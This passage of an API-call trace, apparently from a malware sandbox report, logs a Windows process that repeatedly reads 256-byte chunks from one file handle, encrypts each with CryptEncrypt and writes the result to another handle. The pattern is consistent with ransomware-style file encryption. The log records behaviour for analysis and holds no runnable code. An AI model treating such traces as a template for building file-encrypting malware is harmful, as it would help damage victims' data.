lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.269] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.269] GetLastError () returned 0x0 [0151.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.270] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.270] GetLastError () returned 0x0 [0151.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.270] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.270] GetLastError () returned 0x0 [0151.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.270] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.270] GetLastError () returned 0x0 [0151.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.270] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.270] GetLastError () returned 0x0 [0151.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.270] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.270] GetLastError () returned 0x0 [0151.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.270] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.270] GetLastError () returned 0x0 [0151.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.270] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.271] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.271] GetLastError () returned 0x0 [0151.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.271] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.271] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.271] GetLastError () returned 0x0 [0151.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.271] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.271] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.271] GetLastError () returned 0x0 [0151.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.271] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.271] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.271] GetLastError () returned 0x0 [0151.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.271] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.271] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.271] GetLastError () returned 0x0 [0151.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.271] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.271] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.271] GetLastError () returned 0x0 [0151.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.271] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.272] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.272] GetLastError () returned 0x0 [0151.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.272] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.272] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.272] GetLastError () returned 0x0 [0151.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.272] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.272] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.272] GetLastError () returned 0x0 [0151.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.272] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.272] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.272] GetLastError () returned 0x0 [0151.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.272] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.272] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.272] GetLastError () returned 0x0 [0151.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.272] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.272] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.272] GetLastError () returned 0x0 [0151.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.272] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.273] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.273] GetLastError () returned 0x0 [0151.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.273] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.273] GetLastError () returned 0x0 [0151.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.273] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.273] GetLastError () returned 0x0 [0151.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.273] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.273] GetLastError () returned 0x0 [0151.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.273] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.274] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.274] GetLastError () returned 0x0 [0151.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.274] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.274] GetLastError () returned 0x0 [0151.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.274] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.274] GetLastError () returned 0x0 [0151.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.274] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.274] GetLastError () returned 0x0 [0151.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.274] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.274] GetLastError () returned 0x0 [0151.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.274] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.274] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.274] GetLastError () returned 0x0 [0151.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.275] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.275] GetLastError () returned 0x0 [0151.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.275] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.275] GetLastError () returned 0x0 [0151.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.275] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.275] GetLastError () returned 0x0 [0151.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.275] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, 